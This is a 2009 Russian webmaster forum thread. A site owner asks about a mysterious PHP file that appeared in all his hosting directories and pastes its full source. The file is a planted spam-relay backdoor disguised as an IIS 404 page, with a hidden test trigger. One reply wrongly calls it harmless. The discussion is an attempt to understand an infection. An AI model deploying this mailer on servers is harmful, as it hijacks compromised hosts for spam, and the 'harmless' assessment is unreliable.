Перейти к содержимому


Пользователь месяца
magnet magnet 1-й за Январь
Очков активности: 621 0 тем, 69 сообщений, 6 баллов репутации
Сайт: rbfxdirect.com
ТОП самых активных за этот месяц
  • Фотография OlgaGetman
    #1

    OlgaGetman
    Очков активности: 1125 Вне конкурса за определение пользователя месяца

  • Фотография Андрей WPMasterKZ
    #2

    Андрей WPMasterKZ (wpmaster.kz)
    Очков активности: 592.5 Вне конкурса за определение пользователя месяца

  • Фотография BLIK
    #3

    BLIK
    Очков активности: 585 0 тем, 39 сообщений, 10 баллов репутации

  • Фотография ShowPrint
    #4

    ShowPrint (ShowPrint.ru)
    Очков активности: 577.5 Вне конкурса за определение пользователя месяца

  • Фотография Ixman
    #5

    Ixman (o5cat.ru)
    Очков активности: 480 Вне конкурса за определение пользователя месяца

  • Фотография Mandarin
    #6

    Mandarin
    Очков активности: 232.5 0 тем, 31 сообщение, 5 баллов репутации

  • Фотография r0mZet
    #7

    r0mZet (rz-style.ru)
    Очков активности: 108 0 тем, 18 сообщений, 4 балла репутации

  • Фотография magnet
    #8

    magnet (rbfxdirect.com)
    Очков активности: 102 Вне конкурса за определение пользователя месяца

  • Фотография pozitron123
    #9

    pozitron123
    Очков активности: 54 4 темы, 24 сообщения, 1 балл репутации

  • Фотография player09
    #10

    player09
    Очков активности: 45 4 темы, 18 сообщений, 1 балл репутации

  • Показать весь ТОП 10

Новый Teasernet

Поддержите форум! =)
Апдейты
  • Яндекс ИКС: 25.12.2018
  • Яндекс выдача: 19.02.2019
Топ 5 участников по репутации


Что это такое d3er56son2g.php

#1 Bender

Bender
  • Неактивные
  • 712 сообщений
  • Репутация: 0
0

Отправлено 04 June 2009 - 09:18

Во всех public_html моего хостинга появился файл d3er56son2g.php с таким содержанием:
<?
function XdtdYAoi($xctmp, $from, $to, $subj, $text, $filename) {
	$f		 = fopen($filename,"rb");
	$un		= strtoupper(uniqid(time()));
	$head	  = "From: $from\n";
	$head	 .= "To: $to\n";
	$head	 .= "Reply-To: $from\n";
	$head	 .= "Subject: $subj\n";
	$head	 .= "Content-Type:multipart/mixed;";
	$head	 .= "boundary=\"----------".$un."\"\n\n";
	$zag	   = "------------".$un."\nContent-Type:text/html;\n";
	$zag	  .= "Content-Transfer-Encoding: 8bit\n\n$text\n\n";
	$zag	  .= "------------".$un."\n";
	$zag	  .= "Content-Type: application/octet-stream;";
	$zag	  .= "name=\"".basename($filename)."\"\n";
	$zag	  .= "Content-Transfer-Encoding:base64\n";
	$zag	  .= "Content-Disposition:attachment;";
	$zag	  .= "filename=\"".basename($filename)."\"\n\n";
	$zag	  .= chunk_split(base64_encode(fread($f,filesize($filename))))."\n";
	return @mail("$to", "$subj", $zag, $head);
}
function BJerCRmc($xctmp,$from,$to,$subj,$text) {
	$head	  = "From: $from\n";
	$head	 .= "To: $to\n";	 
	$head	 .= "Subject: $subj\n";
	$head	 .= "Reply-To: $from\n";
	$head	 .= "Content-type: text/html; charset=windows-1251" . "\r\n";
	return @mail($to,$subj,$text,$head);
}
if (!empty($_POST['caption']) && !empty($_POST['email']) && !empty($_POST['clientname']) && !empty($_POST['emailsend']) && !empty($_POST['message']) && ($_POST['index'] == 'send'))
{
  $xclient = substr(htmlspecialchars(trim($_POST['clientname'])), 0, 80);
  $title = substr(htmlspecialchars(trim($_POST['caption'])), 0, 80);
  $mess64 = base64_decode($_POST['message']);
  $mess =  substr(trim($mess64), 0, 10000000);
  $send_to = $_POST['emailsend'];	
  $from = $_POST['email'];
  if($_FILES['file']['name'] !=''){
	if (is_dir("tmp")) { } else { mkdir("tmp"); }
	if(is_uploaded_file($_FILES['file']['tmp_name']))   {
	if(move_uploaded_file($_FILES['file']['tmp_name'], "tmp/".basename($_FILES['file']['name']))) {
	if(XdtdYAoi($xclient,$from,$send_to,$title,$mess,"tmp/".basename($_FILES['file']['name']))!== FALSE) { echo "OK-FILE"; } else { echo "ERROR-FILE"; }
	@unlink("tmp/".basename($_FILES['file']['name']));
	} else { echo "ERROR-UPLOAD"; }
	} else { echo "ERROR-MOVE"; }
  } else {
			 if(BJerCRmc($xclient,$from,$send_to,$title,$mess) !== FALSE) {
		   echo "OK-MESS"; } else { echo "ERROR-MESS"; }
	   }
}
else
{
if ($_GET['index'] == 'test') {echo "OK2009"; exit;} else
{
echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
  BODY { font: 8pt/12pt verdana }
  H1 { font: 13pt/15pt verdana }
  H2 { font: 8pt/12pt verdana }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
 the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="java script:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
 and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>
</TD></TR></TABLE></BODY></HTML>';}
}  
?>
Кто-нибудь может хоть примерно сказать что это такое, я заметил что с его появлением на одном сайте что-то испортилось, что именно - не смог понять, а на другом сайте пропал хтацесс.

 

 

  • 0

#2 Евгений

Евгений
  • Неактивные
  • 481 сообщений
  • Репутация: 0

Отправлено 04 June 2009 - 10:00

а почему бы не спросить у хостера?
  • 0

#3 Bender

Bender
    Topic Starter
  • Неактивные
  • 712 сообщений
  • Репутация: 0

Отправлено 04 June 2009 - 12:09

У меня хостер с "не очень отзывчивой тех поддержкой". Я бы сказал точнее, но материться на форуме вроде как нельзя...

Скажите хоть примерно, что там за функции? Я в пхп полный ноль
  • 0

#4 Евгений

Евгений
  • Неактивные
  • 481 сообщений
  • Репутация: 0

Отправлено 04 June 2009 - 13:14

где то есть форма, там поля примерно такие:

Тема письма
Ваш e-mail (т.е. куда отправляется письмо)
Сообщение
Прикрепленый файл

А этот код обработчик этой формы. Т.е. он отправляет данные на почту тому кто заполнил форму.
Ничего такого вредоносного я в этом скрипте не заметил.

Хотя странно как то нафига он нужен...
  • 0

#5 ZiTosS

ZiTosS
  • Неактивные
  • 5148 сообщений
  • Репутация: 8

Отправлено 04 June 2009 - 21:13

Bender, мне кажется хостер что-то проверяет, только зачем? Такое чувство хотят проверить отправку формы.
Вот что мне только не нравится
if(move_uploaded_file($_FILES['file']['tmp_name'], "tmp/".basename($_FILES['file']['name']))) {
	if(XdtdYAoi($xclient,$from,$send_to,$title,$mess,"tmp/".basename($_FILES['file']['name']))!== FALSE) { echo "OK-FILE"; } else { echo "ERROR-FILE"; }
	@unlink("tmp/".basename($_FILES['file']['name']));
Происходит загрузка документа в каталог tmp, а затем его стирают, но может быть такое, что закинут, а прав на удаление не будет. Вообще можно удалённо через этот скрипт сдать через вас почту. Зачем они это сделали не знаю.
  • 0



Похожие темы

  Название темы Автор Статистика Последнее сообщение

Оформление форума – IPBSkins.ru